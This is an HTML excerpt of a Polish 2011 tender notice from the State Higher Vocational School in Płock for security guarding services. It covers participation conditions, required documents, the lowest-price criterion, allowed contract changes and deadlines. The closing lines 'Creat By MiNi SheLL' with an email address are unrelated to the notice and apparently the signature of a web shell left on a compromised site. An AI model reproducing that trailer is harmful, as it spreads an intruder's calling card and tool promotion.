<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada aktualną koncesję (zezwolenie) udzieloną na prowadzenie działalności w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada doświadczenie zawodowe niezbędne do wykonania zamówienia, tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, wykonał lub wykonuje co najmniej dwie usługi polegające na ochronie osób i mienia w obiektach użyteczności publicznej, o wartości każdej z usług oddzielnie, nie niższej niż 300 000,00 zł brutto. (słownie: trzysta tysięcy złotych).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada osoby zdolne do wykonania zamówienia:
a)	minimum 20 osób posiadające kwalifikacje odpowiednie do wykonania usługi stanowiącej przedmiot zamówienia,
b)	minimum 2 osoby w zakresie grupy interwencyjnej posiadające aktualną licencję pracownika ochrony fizycznej pierwszego stopnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę, stanowiącą co najmniej 100% ceny ofertowej brutto - zaproponowanej w Formularzu oferty - Załącznik Nr 1 do SIWZ przez Wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz oferty załączony do SIWZ - wg wzoru na Załączniku Nr 1 do SIWZ.
2.	Wypełniony Formularz cenowy załączony do SIWZ - wg wzoru na Załączniku Nr 7 do SIWZ.
3.	Wykaz części zamówienia, których wykonanie wykonawca powierzy podwykonawcom - wg wzoru na Załączniku Nr 6 do SIWZ.
      W przypadku, gdy wykonawca nie przewiduje podwykonawców - wpisuje on Nie dotyczy i 
      załącza niewypełniony Załącznik Nr 6 do oferty.
4.	Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów. Pełnomocnictwo powinno mieć formę oryginału lub kopii poświadczonej notarialnie.
5.	W przypadku złożenia oferty wspólnej - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania w umowie zmian w przypadku kiedy potrzeba zmian wynikła po zawarciu umowy w zakresie:
a) wynagrodzenia, w przypadku ustawowej zmiany podatku VAT,
b) zmiany terminu wykonania przedmiotowej usługi (ochrony) oraz zwiększenie jej zakresu, polegające na włączeniu w zakres usługi ochrony obiektu Instytutu Pedagogiki w Płocku, przy ul. Gałczyńskiego 28 oraz remontowanego budynku przy Placu Dąbrowskiego 2 w Płocku w związku z zakończeniem budowlanego remontu generalnego - zamówienia uzupełniające, które realizowane będą na podstawie art. 67 ust. 1 pkt. 6  Ustawy Pzp.
c) zmiany osobowej podwykonawców oraz zakresu podwykonawstwa, w przypadku gdy wykonawca wykonuje umowę przy pomocy podwykonawców, w zakresie zgodnym z SIWZ.
d) terminu realizacji przedmiotu umowy w przypadku wystąpienia poniższych okoliczności:
- zaistnienie działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych,
- zaistnienie klęski żywiołowej, jak huragany, powodzie, trzęsienia ziemi, bunty, niepokoje, strajki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwszplock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku, Plac Dąbrowskiego 2, 09-402 Płock, pok. 127.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2011 godzina 11:45, miejsce: Państwowa Wyższa Szkoła Zawodowa w Płocku, Plac Dąbrowskiego 2, 09-402 Płock, pok. 202 (sekretariat Kanclerza).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com